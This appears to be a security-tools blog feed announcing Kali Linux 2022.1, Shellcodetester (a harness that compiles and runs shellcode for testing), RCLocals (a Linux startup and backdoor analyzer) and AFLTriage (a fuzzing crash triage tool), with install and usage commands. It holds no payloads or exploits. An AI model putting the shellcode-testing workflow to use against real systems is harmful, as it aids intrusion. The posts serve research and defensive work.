<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#accessibility-talk-to-me">Accessibility Features</a></strong> - Speech synthesis is back in the Kali installer</li>
<li><strong><a href="https://www.kali.org/blog/kali-linux-2022-1-release/#new-tools-in-kali">New Tools</a></strong> - Various new tools added, many from ProjectDiscovery!</li></ul><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-1-release/" target="_blank">here</a>.</b><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/downloads/" rel="nofollow" target="_blank" title="Download Kali Linux 2020.3">Download Kali Linux 2022.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19965173892570368532022-02-15T17:30:00.025-03:002022-02-15T17:30:00.273-03:00Shellcodetester - An Application To Test Windows And Linux Shellcodes<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=s695" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="695" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=w640-h298" width="640" /></a></div><p style="text-align: center;"><br /></p> <p dir="auto">This tools test generated ShellCodes.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <a name="user-content-usage" target="_blank" title="An application to test windows and linux shellcodes (2)"></a> <h3 dir="auto">Usage</h3> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=s695" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="695" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEh359EAhOCA5GJ7ojPG5cU1nXGVd0eq2gIXlEH8IV5sHGWdvVOyiGVgm1kwJn1vWP3q-qV-wI258ED_fzW4a_zgHRTe7HwV9pDqSdUVu2BTpyZlQ5ceVU08S8pwVzIFYQE6lWx4WTklkWIoyFugaZbFlQcXDzeMsvVHKl6QodXpBLdRC4fDVP_Bg3s9=w640-h298" width="640" /></a></p><p style="text-align: center;"><br /></p> <a name="user-content-exemple" target="_blank" title="An application to test windows and linux shellcodes (4)"></a> <h3 dir="auto">Exemple</h3> <p style="text-align: center;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhos2UuZHRXmJOWRoWhK5Qh3vhp6DJi3JLU1nOXH4I5sl0dDHNupYthcmIWa-Ccxb3NS6sbnw4_khUWoVp5HKF_4mvNqW0uKB5B4bXXCjn49Yml1H-eog7E5L4Hv3jwGy0W7o7eDR0On1imVdpxgGFROW7EkeWA7v_k0ZS4YZpLtSAkiijfJv5Q4qnx=s1002" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="176" data-original-width="1002" height="112" src="https://blogger.googleusercontent.com/img/a/AVvXsEhos2UuZHRXmJOWRoWhK5Qh3vhp6DJi3JLU1nOXH4I5sl0dDHNupYthcmIWa-Ccxb3NS6sbnw4_khUWoVp5HKF_4mvNqW0uKB5B4bXXCjn49Yml1H-eog7E5L4Hv3jwGy0W7o7eDR0On1imVdpxgGFROW7EkeWA7v_k0ZS4YZpLtSAkiijfJv5Q4qnx=w640-h112" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhAktm6Whx443Mj9PzCTsrwzW34TC7xIc6lXfRgAEOlCxMqh2eD9N_v0YQ8xH0rVex2wLlqep43IvGlQl4AyCAsU29FA2BF16olaXH6U0o5iWg06bKPwqf-9ABO3LUb4enD_K_If_oN3ckVw9tF0uEhaAfNGCjPm8zP5XASrZ-S62Bfkv6orh068ojo=s695" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="695" height="298" src="https://blogger.googleusercontent.com/img/a/AVvXsEhAktm6Whx443Mj9PzCTsrwzW34TC7xIc6lXfRgAEOlCxMqh2eD9N_v0YQ8xH0rVex2wLlqep43IvGlQl4AyCAsU29FA2BF16olaXH6U0o5iWg06bKPwqf-9ABO3LUb4enD_K_If_oN3ckVw9tF0uEhaAfNGCjPm8zP5XASrZ-S62Bfkv6orh068ojo=w640-h298" width="640" /></a></div><p style="text-align: center;"><br /></p> <a name="user-content-shellcode-tester-linux" target="_blank" title="An application to test windows and linux shellcodes (7)"></a> <h2 dir="auto">ShellCode Tester Linux</h2> <a name="user-content-instalation" target="_blank" title="An application to test windows and linux shellcodes (8)"></a> <h3 dir="auto">Instalation</h3> <pre><code>git clone https://github.com/helviojunior/shellcodetester.git<br />cd shellcodetester/Linux<br />make<br /></code></pre> <a name="user-content-id1" target="_blank" title="An application to test windows and linux shellcodes (9)"></a> <h3 dir="auto">Usage</h3> <p dir="auto">Without break-point:</p> <pre><code>shellcodetester [file.asm]<br /></code></pre> <p dir="auto">With break-point (INT3). The break-point will be inserted before our generated shellcode:</p> <pre><code>shellcodetester [file.asm] --break-point<br /></code></pre> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/helviojunior/shellcodetester" rel="nofollow" target="_blank" title="Download Shellcodetester">Download Shellcodetester</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17257641395102196262022-01-09T08:30:00.001-03:002022-01-09T08:30:00.271-03:00RCLocals - Linux Startup Analyzer <p dir="auto" style="text-align: center;"><a href="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/s1600/RCLocals_1_1-710961.jpeg"><img alt="" border="0" height="242" id="BLOGGER_PHOTO_ID_7050447421438923458" src="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/w640-h242/RCLocals_1_1-710961.jpeg" width="640" /></a></p><p dir="auto"><br /></p><p dir="auto">Inspired by 'Autoruns' from Sysinternals, RCLocals analyzes all <a href="https://www.kitploit.com/search/label/Linux" target="_blank" title="Linux">Linux</a> startup possibilities to find backdoors, also performs process integrity verification, <a href="https://www.kitploit.com/search/label/Scan" target="_blank" title="scan">scan</a> for <a href="https://www.kitploit.com/search/label/DLL" target="_blank" title="DLL">DLL</a> injected processes and much more</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Things covered:</h2> <p dir="auto">·<strong>List GPG keys trusted by the system</strong></p> <p dir="auto">·<strong>Installed Packages</strong></p> <p dir="auto">·<strong>File integrity</strong></p> <p dir="auto">·<strong>Process integrity</strong> (process and libraries loaded in a process that not belongs to any installed package)</p> <p dir="auto">·<strong>Processes with name spoofed</strong> (processes that use prctl() to change their name in /bin/ps)</p> <p dir="auto">·<strong>CRON entries</strong></p> <p dir="auto">·<strong>RC files</strong></p> <p dir="auto">·<strong>X system startup files</strong></p> <p dir="auto">·<strong>Active Systemd Units</strong></p> <p dir="auto">·<strong>Systemd Timer Units</strong></p> <p dir="auto">·<strong>tmpfiles.d</strong></p> <p dir="auto">·<strong>linger users</strong></p> <h2 dir="auto">USAGE</h2> <p dir="auto">For only suspicious information:</p> <p dir="auto">#python3 rclocals.py --triage</p> <p dir="auto">For detailed information:</p> <p dir="auto">#python3 rclocals.py --all</p> <h2 dir="auto">Screenshots</h2> <p dir="auto" style="text-align: center;"><a href="https://github.com/YJesus/RCLocals/blob/master/screenshots/1.jpg" rel="nofollow" target="_blank" title="Linux startup analyzer (4)"></a><a href="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/s1600/RCLocals_1_1-710961.jpeg"><img alt="" border="0" height="242" id="BLOGGER_PHOTO_ID_7050447421438923458" src="http://1.bp.blogspot.com/-pZ6n3FAVAyc/Ydg4ky5vksI/AAAAAAAA7ns/ARr2StWdejMHCshLORn4Cninhe_zn8rGACK4BGAYYCw/w640-h242/RCLocals_1_1-710961.jpeg" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://github.com/YJesus/RCLocals/blob/master/screenshots/2.png" rel="nofollow" target="_blank" title="Linux startup analyzer (5)"></a><a href="http://2.bp.blogspot.com/-9lIuUc6YfWQ/Ydg4lLf_5CI/AAAAAAAA7n0/bHhQJT0iefQz-42CDVCiFGDaJ147vggGgCK4BGAYYCw/s1600/RCLocals_2_2-712209.png"><img alt="" border="0" height="576" id="BLOGGER_PHOTO_ID_7050447428041827362" src="http://2.bp.blogspot.com/-9lIuUc6YfWQ/Ydg4lLf_5CI/AAAAAAAA7n0/bHhQJT0iefQz-42CDVCiFGDaJ147vggGgCK4BGAYYCw/w640-h576/RCLocals_2_2-712209.png" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://github.com/YJesus/RCLocals/blob/master/screenshots/3.png" rel="nofollow" target="_blank" title="Linux startup analyzer (6)"></a><a href="http://1.bp.blogspot.com/-_QyTqgOjcbA/Ydg4lSsB8DI/AAAAAAAA7n8/V1YsW7krWvEQpowzApJ1yFa5A0Yo91QPgCK4BGAYYCw/s1600/RCLocals_3_3-713220.png"><img alt="" border="0" height="356" id="BLOGGER_PHOTO_ID_7050447429971341362" src="http://1.bp.blogspot.com/-_QyTqgOjcbA/Ydg4lSsB8DI/AAAAAAAA7n8/V1YsW7krWvEQpowzApJ1yFa5A0Yo91QPgCK4BGAYYCw/w640-h356/RCLocals_3_3-713220.png" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://github.com/YJesus/RCLocals/blob/master/screenshots/4.png" rel="nofollow" target="_blank" title="Linux startup analyzer (7)"></a><a href="http://3.bp.blogspot.com/-E1JXfSQ7768/Ydg4lnWy1yI/AAAAAAAA7oE/N3GRJ2rpn9IbQKDFBJ15CFaS_g08ntBiQCK4BGAYYCw/s1600/RCLocals_4_4-714244.png"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7050447435519416098" src="http://3.bp.blogspot.com/-E1JXfSQ7768/Ydg4lnWy1yI/AAAAAAAA7oE/N3GRJ2rpn9IbQKDFBJ15CFaS_g08ntBiQCK4BGAYYCw/w528-h640/RCLocals_4_4-714244.png" width="528" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/YJesus/RCLocals" rel="nofollow" target="_blank" title="Download RCLocals">Download RCLocals</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-23746862554289839472021-12-09T17:30:00.001-03:002021-12-09T17:30:00.261-03:00AFLTriage - Tool To Triage Crashing Input Files Using A Debugger<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjp-i3LciohjRKXn16O7afv3-f6pkcU54JgRWbOv1Odwb2V40IueJbVwD2s-qRBvKcDmuFnfv1EECjhdSDVGEwqNQudLrSfSy0m7Wv2NAIoRfN9yFitCuCxiTVmV8aApOJ0ozeBPVax8hDZu6w3kcvI7fyrYSrLtqd_PuiS9fXs_F5cfjv4mNhflLunhg=s1440" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1440" height="320" src="https://blogger.googleusercontent.com/img/a/AVvXsEjp-i3LciohjRKXn16O7afv3-f6pkcU54JgRWbOv1Odwb2V40IueJbVwD2s-qRBvKcDmuFnfv1EECjhdSDVGEwqNQudLrSfSy0m7Wv2NAIoRfN9yFitCuCxiTVmV8aApOJ0ozeBPVax8hDZu6w3kcvI7fyrYSrLtqd_PuiS9fXs_F5cfjv4mNhflLunhg=w640-h320" width="640" /></a></div><p><br /></p> <p dir="auto">AFLTriage is a tool to triage crashing input files using a debugger. It is designed to be portable and not require any run-time dependencies, besides libc and an external debugger. It supports triaging <a href="https://www.kitploit.com/search/label/Crashes" target="_blank" title="crashes">crashes</a> generated by any program, not just AFL, but recognizes AFL directories specially, hence the name.</p> <p dir="auto">Some notable features include:</p> <ul dir="auto"> <li>Multiple report formats: <a href="https://github.com/quic/AFLTriage/blob/main/src/report/res/test_report_text/asan_stack_bof.txt" rel="nofollow" target="_blank" title="text">text</a>, <a href="https://github.com/quic/AFLTriage/blob/main/src/report/res/test_report_text/asan_stack_bof.json" rel="nofollow" target="_blank" title="JSON">JSON</a>, and <a href="https://github.com/quic/AFLTriage/blob/main/src/report/res/test_report_text/asan_stack_bof.rawjson" rel="nofollow" target="_blank" title="raw">raw </a><a href="https://www.kitploit.com/search/label/Debugger" target="_blank" title="debugger">debugger</a> JSON</li> <li>Parallel crash triage</li> <li>Crash deduplication</li> <li>Sanitizer report parsing</li> <li>Supports <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> targets with or without symbols/debugging information</li> <li>Source code and variables will be annotated in reports for context</li> </ul> <p dir="auto">Currently AFLTriage only supports GDB and has only been tested on Linux C/C++ targets. Note that AFLTriage does not classify crashes by potential exploitablity. Accurate exploitability classification is very target and scenario specific and is best left to specialized tools and expert analysts.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Usage</h2> <p dir="auto">Usage of AFLTriage is quite straightforward. You need your inputs to triage, an output <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> for reports, and the binary and its arguments to triage.</p> <p dir="auto">Example:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@ AFLTriage v1.0.0 [+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00)) [+] Image triage cmdline: "./target_binary --option-one @@" [+] Reports will be output to directory "reports" [+] Triaging AFL directory fuzzing_directory/ (41 files) [+] Triaging 41 testcases [+] Using 24 threads to triage [+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6) [+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0] "><pre><code>$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@<br />AFLTriage v1.0.0<br /><br />[+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00))<br />[+] Image triage cmdline: "./target_binary --option-one @@"<br />[+] Reports will be output to directory "reports"<br />[+] Triaging AFL directory fuzzing_directory/ (41 files)<br />[+] Triaging 41 testcases<br />[+] Using 24 threads to triage<br />[+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6)<br />[+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0]<br /></code></pre></div> <p dir="auto">Similar to AFL the <code>@@</code> is replaced with the path of the file to be triaged. AFLTriage will take care of the rest.</p> <h2 dir="auto">Building and Running</h2> <p dir="auto">You will need a working Rust build environment. Once you have cargo and rust installed, building and running is simple:</p> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="cd afltriage-rs/ cargo run --help <compilation> Finished dev [unoptimized + debuginfo] target(s) in 0.33s Running `target/debug/afltriage --help` <AFLTriage usage> ... "><pre><code>cd afltriage-rs/<br />cargo run --help<br /><br /><compilation><br /><br /> Finished dev [unoptimized + debuginfo] target(s) in 0.33s<br /> Running `target/debug/afltriage --help`<br /><br /><AFLTriage usage><br />...<br /></code></pre></div> <h2 dir="auto">Extended Usage</h2> <div class="snippet-clipboard-content position-relative overflow-auto" data-snippet-clipboard-copy-content="afltriage 1.0.0 Quickly triage and summarize crashing testcases USAGE: afltriage -i <input>... -o <output> <command>... OPTIONS: -i <input>... A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the last argument passed to AFLTriage -- this is reserved for the command. -o <output> The output directory for triage report files. Use '-' to print entire reports to console. -t, --timeout <timeout> The timeout in milliseconds for each testcase to triage. [default: 60000] -j, --jobs <jobs> How many threads to use during triage. --report-formats <report_formats>... The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible values: text, json, rawjson] --bucket-strategy <bucket_strategy> The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage, first_frame, first_frame_raw, first_5_frames, function_names, first_function_name] --child-output Include child output in triage reports. --child-output-lines <child_output_lines> How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not recommended). [default: 25] --stdin Provide testcase input to the target via stdin instead of a file. --profile-only Perform environment checks, describe the inputs to be triaged, and profile the target binary. --skip-profile Skip target profiling before input processing. --debug Enable low-level <a title=" debugging="" href="https://www.kitploit.com/search/label/Debugging">debugging output of triage operations. -h, --help Prints help information -V, --version Prints version information ARGS: <command>... The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or --stdin. Optionally use -- to delimit the start of the command. "><pre><code>afltriage 1.0.0<br />Quickly triage and summarize crashing testcases<br /><br />USAGE:<br /> afltriage -i <input>... -o <output> <command>...<br /><br />OPTIONS:<br /> -i <input>...<br /> A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to<br /> be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the<br /> last argument passed to AFLTriage -- this is reserved for the command.<br /> -o <output><br /> The output directory for triage report files. Use '-' to print entire reports to console.<br /><br /> -t, --timeout <timeout><br /> The timeout in milliseconds for each testcase to triage. [default: 60000]<br /><br /> -j, --jobs <jobs> <br /> How many threads to use during triage.<br /><br /> --report-formats <report_format s>...<br /> The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible<br /> values: text, json, rawjson]<br /> --bucket-strategy <bucket_strategy><br /> The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage,<br /> first_frame, first_frame_raw, first_5_frames, function_names, first_function_name]<br /> --child-output <br /> Include child output in triage reports.<br /><br /> --child-output-lines <child_output_lines><br /> How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not<br /> recommended). [default: 25]<br /> --stdin <br /> Provide testcase input to the target via stdin instead of a file.<br /><br /> --profile-only<br /> Perform environment chec ks, describe the inputs to be triaged, and profile the target binary.<br /><br /> --skip-profile <br /> Skip target profiling before input processing.<br /><br /> --debug <br /> Enable low-level debugging output of triage operations.<br /><br /> -h, --help <br /> Prints help information<br /><br /> -V, --version <br /> Prints version information<br /><br /><br />ARGS:<br /> <command>... <br /> The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or<br /> --stdin. Optionally use -- to delimit the start of the command.<br /></code></pre></div> <h2 dir="auto">Related Projects</h2> <ul dir="auto"> <li><a href="https://github.com/jfoote/exploitable" rel="nofollow" target="_blank" title="GDB Exploitable">GDB Exploitable</a> - A big inspiration for AFLTriage</li> <li><a href="https://github.com/bnagy/crashwalk" rel="nofollow" target="_blank" title="Crashwalk">Crashwalk</a></li> <li>afl-collect from <a href="https://github.com/rc0r/afl-utils" rel="nofollow" target="_blank" title="afl-utils">afl-utils</a></li></ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/quic/AFLTriage" rel="nofollow" target="_blank" title="Download AFLTriage">Download AFLTriage</a></span></b></div>Unknownnoreply@blogger.com